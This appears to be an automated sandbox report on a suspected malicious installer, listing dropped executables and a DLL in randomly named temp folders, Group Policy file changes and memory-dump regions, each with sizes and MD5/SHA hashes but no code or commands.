SHA512956121d56b0aabe011f655ccaf52ee961d656b874234dbc4f1cf7a94f05f96dc78e15e31f6bbb1ded02b56164549d05c00ac66d7fda96b9b3fd16ab522857481
-
C:\Users\Admin\AppData\Local\Temp\7zS6DF1.tmp\Install.exeFilesize
6.3MB
MD50bd4ce3dbe52d5c651a16728d8d1ff70
SHA1555f748fbbaacc9a7e6cff87edb415954780036e
SHA256324d74d2d6cba61c6e15af514f0529c93d82df89af255e81e08cc495f4eacb0f
SHA512956121d56b0aabe011f655ccaf52ee961d656b874234dbc4f1cf7a94f05f96dc78e15e31f6bbb1ded02b56164549d05c00ac66d7fda96b9b3fd16ab522857481
-
C:\Users\Admin\AppData\Local\Temp\7zS70DF.tmp\Install.exeFilesize
6.8MB
MD5ffccdae3757ca3f12a5dc1a378a57e16
SHA16ac2d19ba80e9bf60e068b8a247dfe4e9a058f03
SHA2565ae51af695f9f150ef67fb65f14b94634b11e2231d42f0cd610dbcae685595d3
SHA512dba70ad3534f75d1be9e13004401395ecd95de406906500f0867599c90bfbdc843eae74a99daf25f1a9012bb2e8ba4263594b343b0ace4e44483bb4087019fef
-
C:\Users\Admin\AppData\Local\Temp\7zS70DF.tmp\Install.exeFilesize
6.8MB
MD5ffccdae3757ca3f12a5dc1a378a57e16
SHA16ac2d19ba80e9bf60e068b8a247dfe4e9a058f03
SHA2565ae51af695f9f150ef67fb65f14b94634b11e2231d42f0cd610dbcae685595d3
SHA512dba70ad3534f75d1be9e13004401395ecd95de406906500f0867599c90bfbdc843eae74a99daf25f1a9012bb2e8ba4263594b343b0ace4e44483bb4087019fef
-
C:\Users\Admin\AppData\Local\Temp\PKTFfLRluxQTmPRqk\bWhXUEvIQwsbyrm\CxyCLWn.exeFilesize
6.8MB
MD5ffccdae3757ca3f12a5dc1a378a57e16
SHA16ac2d19ba80e9bf60e068b8a247dfe4e9a058f03
SHA2565ae51af695f9f150ef67fb65f14b94634b11e2231d42f0cd610dbcae685595d3
SHA512dba70ad3534f75d1be9e13004401395ecd95de406906500f0867599c90bfbdc843eae74a99daf25f1a9012bb2e8ba4263594b343b0ace4e44483bb4087019fef
-
C:\Users\Admin\AppData\Local\Temp\PKTFfLRluxQTmPRqk\bWhXUEvIQwsbyrm\CxyCLWn.exeFilesize
6.8MB
MD5ffccdae3757ca3f12a5dc1a378a57e16
SHA16ac2d19ba80e9bf60e068b8a247dfe4e9a058f03
SHA2565ae51af695f9f150ef67fb65f14b94634b11e2231d42f0cd610dbcae685595d3
SHA512dba70ad3534f75d1be9e13004401395ecd95de406906500f0867599c90bfbdc843eae74a99daf25f1a9012bb2e8ba4263594b343b0ace4e44483bb4087019fef
-
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751Filesize
717B
MD5ec8ff3b1ded0246437b1472c69dd1811
SHA1d813e874c2524e3a7da6c466c67854ad16800326
SHA256e634c2d1ed20e0638c95597adf4c9d392ebab932d3353f18af1e4421f4bb9cab
SHA512e967b804cbf2d6da30a532cbc62557d09bd236807790040c6bee5584a482dc09d724fc1d9ac0de6aa5b4e8b1fff72c8ab3206222cc2c95a91035754ac1257552
-
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\48F3BB146086CEF37D471FBE460215C9Filesize
503B
MD5c10060ddb8b33344d5d2619c32f1629c
SHA16e869f5b2d13977c4ab4014094959c861b57790f
SHA256728725273cc21072ccc206e0819b521944200dc11a3ae29c806a8962ffc9e8dd
SHA512fcdd3b11eca2b97bc5f18f947f77c6425854c1d74a884ef3ba59fb794b7946ccd6d95d46a81a14785eb122bdcf8ad1714e34e9fc01e9abc3f3b83c11ffd2dd8f
-
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751Filesize
192B
MD564a363cf5cbe639f29a135023f1eac84
SHA193a2d7de3a7a536d3568916ce84324aac3fc9da5
SHA256df758c38ba1137a3ee5022ba0bed100ca1a1be041cb0fe18247e74e5a3583172
SHA5123bb9a0c257f8bd1740142866a2b692c2c064d340f17cb11c8f1d4c3441d6212e8480e7d6099f80ab66184dfb9a00f652f7c47c95fd7e3c1e6000c90649ba5ef5
-
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\48F3BB146086CEF37D471FBE460215C9Filesize
560B
MD5a8ffa2023c637186257df858c100c8c6
SHA1c6b1ac4a80c2ee9d6e88a110e1d1bd62cb1b3900
SHA2560bcca663a22fea8edb67fea54f253b8b6c48bb7a14b84fd9dc801f49e52b3ae1
SHA5121bf756ed5de19570b43dd1d7eb85cbf29cbb9dea62db800850556513c4fb2efbaa693085faea1c86fdc1ce82793fba848a2ceb848d4b4d9705cea0114d3fe6e9
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
1KB
MD533b19d75aa77114216dbc23f43b195e3
SHA136a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
11KB
MD5b33c71c368933e56f7cbb3e6997d4470
SHA1f76199f39092b7df021b701d3c1c79f20037100e
SHA2566c821ad2a7e3878fcf09a52e91381cafd089fbf406037441860bc7782ea43120
SHA512ee9c797fbe3ce84dfcb32557ce8d93923d7cd74e2ec0dc2e54c360b851fb8acd51114b9d962ef2b09805ceb2bbab4e985abba4856d4fac9b2c9f064df96ec322
-
C:\Windows\Temp\oCRUNVefZTIhACRx\cBNzkoAEmSRwZre\WGyeiWG.exeFilesize
6.8MB
MD5ffccdae3757ca3f12a5dc1a378a57e16
SHA16ac2d19ba80e9bf60e068b8a247dfe4e9a058f03
SHA2565ae51af695f9f150ef67fb65f14b94634b11e2231d42f0cd610dbcae685595d3
SHA512dba70ad3534f75d1be9e13004401395ecd95de406906500f0867599c90bfbdc843eae74a99daf25f1a9012bb2e8ba4263594b343b0ace4e44483bb4087019fef
-
C:\Windows\Temp\oCRUNVefZTIhACRx\cBNzkoAEmSRwZre\WGyeiWG.exeFilesize
6.8MB
MD5ffccdae3757ca3f12a5dc1a378a57e16
SHA16ac2d19ba80e9bf60e068b8a247dfe4e9a058f03
SHA2565ae51af695f9f150ef67fb65f14b94634b11e2231d42f0cd610dbcae685595d3
SHA512dba70ad3534f75d1be9e13004401395ecd95de406906500f0867599c90bfbdc843eae74a99daf25f1a9012bb2e8ba4263594b343b0ace4e44483bb4087019fef
-
C:\Windows\Temp\oCRUNVefZTIhACRx\cqqgsgst\idMTQsK.dllFilesize
6.2MB
MD521f2e2855c00210b9ddbe4363e485938
SHA121a1797718e32220b0f8c4a87cfeac41575fe892
SHA256b674f303bb97741166d08b9b40b34625d6774176e5f45d48641584893a4734fc
SHA512419445cb670e28c7a46747ebe36d0a5845c4c398e9d811f584200e09285752e3758f2f1790dadfcf6ae007a0c94bb4a5277aacbab844c8c9b0e625e4c03f105f
-
C:\Windows\Temp\oCRUNVefZTIhACRx\cqqgsgst\idMTQsK.dllFilesize
6.2MB
MD521f2e2855c00210b9ddbe4363e485938
SHA121a1797718e32220b0f8c4a87cfeac41575fe892
SHA256b674f303bb97741166d08b9b40b34625d6774176e5f45d48641584893a4734fc
SHA512419445cb670e28c7a46747ebe36d0a5845c4c398e9d811f584200e09285752e3758f2f1790dadfcf6ae007a0c94bb4a5277aacbab844c8c9b0e625e4c03f105f
-
C:\Windows\system32\GroupPolicy\Machine\Registry.polFilesize
4KB
MD51c8117209989692a2b8c9d5d8aff9004
SHA1f1e87b9104fe2b7e00cc2f460ff106fc57761ae6
SHA256926d57390968e47e582d8c9f88a7ab8da3458528910ffbba6e1651e788e37cda
SHA5126578bd8a0286848a25a40b172594f55f50ef44695d17a184d7439f4fec40f3912552018c04af695a3e98ef4fc46e8e355d4915cf8073d7ea6083239af2d2bc6d
-
C:\Windows\system32\GroupPolicy\gpt.iniFilesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
memory/420-174-0x0000000000000000-mapping.dmp
-
memory/452-202-0x0000000000000000-mapping.dmp
-
memory/532-177-0x0000000000000000-mapping.dmp
-
memory/676-150-0x0000000000000000-mapping.dmp
-
memory/740-219-0x00007FF813FD0000-0x00007FF814A91000-memory.dmpFilesize
10.8MB
-
memory/808-227-0x0000000003BB0000-0x0000000003C35000-memory.dmpFilesize
532KB
-
memory/808-231-0x0000000004000000-0x000000000406A000-memory.dmpFilesize
424KB
-
memory/808-245-0x0000000005890000-0x0000000005947000-memory.dmpFilesize
732KB
-
memory/808-241-0x00000000049D0000-0x0000000004A48000-memory.dmpFilesize
480KB
-
memory/808-170-0x0000000000000000-mapping.dmp
-
memory/872-151-0x0000025C672D0000-0x0000025C672F2000-memory.dmpFilesize
136KB
-
memory/872-153-0x00007FF8144F0000-0x00007FF814FB1000-memory.dmpFilesize
10.8MB
-
memory/880-163-0x0000000003BA0000-0x00000000041C8000-memory.dmpFilesize
6.2MB
-
memory/880-167-0x0000000004AB0000-0x0000000004ACE000-memory.dmpFilesize
120KB
-
memory/880-166-0x0000000004430000-0x0000000004496000-memory.dmpFilesize
408KB
-
memory/880-165-0x00000000043C0000-0x0000000004426000-memory.dmpFilesize
408KB
-
memory/880-164-0x0000000003AE0000-0x0000000003B02000-memory.dmpFilesize
136KB
-
memory/880-162-0x0000000001180000-0x00000000011B6000-memory.dmpFilesize
216KB
-
memory/880-161-0x0000000000000000-mapping.dmp
-
memory/912-147-0x0000000000000000-mapping.dmp
-
memory/964-132-0x0000000000000000-mapping.dmp
-
memory/968-176-0x0000000000000000-mapping.dmp
-
memory/1068-186-0x0000000000000000-mapping.dmp
-
memory/1080-178-0x0000000000000000-mapping.dmp
-
memory/1084-196-0x0000000000000000-mapping.dmp
-
memory/1120-172-0x0000000000000000-mapping.dmp
-
memory/1460-169-0x0000000000000000-mapping.dmp
-
memory/1464-200-0x0000000000000000-mapping.dmp
-
memory/1504-210-0x0000000000000000-mapping.dmp
-
memory/1724-144-0x0000000000000000-mapping.dmp
-
memory/1736-173-0x0000000000000000-mapping.dmp
-
memory/1840-207-0x0000000000000000-mapping.dmp
-
memory/1988-211-0x0000000000000000-mapping.dmp
-
memory/2084-135-0x0000000000000000-mapping.dmp
-
memory/2084-138-0x0000000010000000-0x0000000010D78000-memory.dmpFilesize
13.5MB
-
memory/2200-221-0x0000000000000000-mapping.dmp
-
memory/2208-192-0x0000000000000000-mapping.dmp
-
memory/2288-208-0x0000000000000000-mapping.dmp
-
memory/2308-145-0x0000000000000000-mapping.dmp
-
memory/2392-197-0x0000000000000000-mapping.dmp
-
memory/2440-152-0x0000000000000000-mapping.dmp
-
memory/2652-203-0x0000000000000000-mapping.dmp
-
memory/2668-206-0x0000000000000000-mapping.dmp
-
memory/3020-185-0x0000000000000000-mapping.dmp
-
memory/3068-204-0x0000000000000000-mapping.dmp
-
memory/3088-218-0x0000000000000000-mapping.dmp
-
memory/3100-214-0x0000000000000000-mapping.dmp
-
memory/3160-199-0x0000000000000000-mapping.dmp
-
memory/3388-187-0x0000000000000000-mapping.dmp
-
memory/3492-168-0x0000000000000000-mapping.dmp
-
memory/3500-248-0x0000000001FC0000-0x0000000002D38000-memory.dmpFilesize
13.5MB
-
memory/3576-198-0x0000000000000000-mapping.dmp
-
memory/3596-155-0x0000000000000000-mapping.dmp
-
memory/3928-220-0x0000000000000000-mapping.dmp
-
memory/4064-149-0x0000000000000000-mapping.dmp
-
memory/4084-146-0x0000000000000000-mapping.dmp
-
memory/4136-154-0x0000000000000000-mapping.dmp
-
memory/4168-148-0x0000000000000000-mapping.dmp
-
memory/4168-179-0x0000000000000000-mapping.dmp
-
memory/4260-191-0x0000000000000000-mapping.dmp
-
memory/4308-190-0x0000000000000000-mapping.dmp
-
memory/4336-215-0x0000000000000000-mapping.dmp
-
memory/4348-175-0x0000000000000000-mapping.dmp
-
memory/4360-158-0x0000000010000000-0x0000000010D78000-memory.dmpFilesize
13.5MB
-
memory/4416-188-0x0000000000000000-mapping.dmp
-
memory/4448-193-0x0000000000000000-mapping.dmp
-
memory/4460-212-0x0000000000000000-mapping.dmp
-
memory/4504-171-0x0000000000000000-mapping.dmp
-
memory/4624-141-0x0000000000000000-mapping.dmp
-
memory/4780-182-0x0000000000000000-mapping.dmp
-
memory/4788-184-0x0000000000000000-mapping.dmp
-
memory/4812-143-0x0000000000000000-mapping.dmp
-
memory/4820-183-0x0000000000000000-mapping.dmp
-
memory/4820-142-0x0000000000000000-mapping.dmp
-
memory/4848-181-0x0000000000000000-mapping.dmp
-
memory/4872-189-0x0000000000000000-mapping.dmp
-
memory/4888-205-0x0000000000000000-mapping.dmp
-
memory/4988-180-0x0000000000000000-mapping.dmp
-
memory/5064-201-0x0000000000000000-mapping.dmp
-
memory/5076-209-0x0000000000000000-mapping.dmp